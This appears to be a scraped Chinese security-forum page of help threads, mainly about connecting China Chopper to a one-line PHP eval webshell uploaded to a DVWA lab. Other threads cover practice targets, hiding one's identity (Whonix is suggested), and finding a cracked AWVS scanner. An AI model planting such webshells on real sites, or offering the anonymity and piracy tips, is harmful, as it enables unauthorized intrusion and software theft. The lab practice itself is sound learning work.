|
|
|
[求助] 使用菜刀,但不能获取到网站文件
afy 如果靶机上有安全狗之类的防护软件,先彻底关闭;换菜刀;我还真怀疑你知不知道网站根目录在哪,写个phpinfo看看。phpinfo内容太多,不知该截哪部分的图 |
|
[求助] 使用菜刀,但不能获取到网站文件
没安全狗,没任何防护软件。自己手动post一个包到上传的包含一句话木马的php页面,能正常访问。昨天菜刀连上去,响应报文content length为0,今天把小马由 <?php @eval($_POST['chopper']);?> 改为了这样 <?php eval($_POST['chopper']);?> ,菜刀中就显示了报错信息,以下是菜刀中显示的响应报文 HTTP/1.1 200 OK Date: Wed, 09 Aug 2017 02:51:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/7.1.6 X-Powered-By: PHP/7.1.6 Content-Length: 185 Content-Type: text/html; charset=UTF-8 <br /> <b>Warning</b>: Cannot call assert() with string argument dynamically in <b>C:\xampp\htdocs\DVWA-master\hackable\uploads\test1.php(1) : eval()'d code</b> on line <b>1</b><br />
|
|
|
|
|
|
[求助] 使用菜刀,但不能获取到网站文件
afy 到靶机上检查马的路径;检查马的单引号、分号等是否为英文;自己先在靶机上写个马,再用菜刀连接,以检查是否有其他未知因素。。。试过了,应该没有你说的问题 |
|
[求助] 使用菜刀,但不能获取到网站文件
从另一个地方下的菜刀,这个就查看目录的时候总是500,internal server error.....我开始觉得是不是菜刀的问题了......有朋友提供一个确定没问题的菜刀吗.......... |
|
|
|
[求助]一条XCTF实训平台上的题,找不到writeup,有没大神分享一下思路
破九 通道是不是已经关闭了?楼主试试,今天早上在本地测试是可以refresh到自己或者百度的,不知道是不是题目变更了。这篇博客中有这题writeup?我好像找不到......... |
|
[求助]有没什么好的渗透的学习视频推荐?
casiojxnklla 楼主你是做WEB开发的吗?如果是做WEB开发的, 那就学习一下网络协议的工作原理就可以了, 学完之后, 自己发几个以太网包做下测试, 如果自己能手动封装TCP包、HTTP包, 就可以了, 接下来就要自 ...我现在在一家公司做java开发实习,不过我兴趣是渗透。网络协议的话,学校的课程里学过........ |
|
[求助]学渗透,想练练手,有没什么隐藏自己的手段
破九 网络安全法已经实施了,慎重点兄弟,即使你不以商业为目的渗透,没有经过允许也是非法的,所以刷CTF,搭建测试平台,源代码审计才是正道。我去面渗透实习生,几次了,都被hr抓着我没实际渗透经验这点说事,一次还直接被说有些高中的玩渗透已经玩得很厉害了,我觉得还是世纪渗透比较好.........其实我原本找渗透实习就是为了合法地学习渗透,拿点经验,然而.....不过网络安全法的实施大概又会增加不少麻烦吧.... |
|
|
|
[求助]有没awvs 11 破解版的下载地址?
破九 11好像是web版,10的话是软件版,感觉用10.5的人比较多,你搜一下,那个52pojie有,如果没帐户,你私信我,我发给你。吾爱破解给的链接已经挂了....10.5和11的都是..... |
|
|
|
[求助]学渗透,想练练手,有没什么隐藏自己的手段
然后 虚拟机自己搭建网站,自己黑自己这个的话,目前我搭建过dvwa,不过感觉dvwa是很明确地告诉你哪里有什么问题,想找些比较接近现实的网站,就是有正常的功能的,而你一开始并不知道哪里有什么问题,需要自己慢慢去发掘的,这样的网站 |
|
[求助]学渗透,想练练手,有没什么隐藏自己的手段
Tennn 用whonix 系统whonix确保自己的安全性吗?还是怕被查水表,不过面个渗透实习生,又总被hr抓住没实战经验这点来说事....... |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值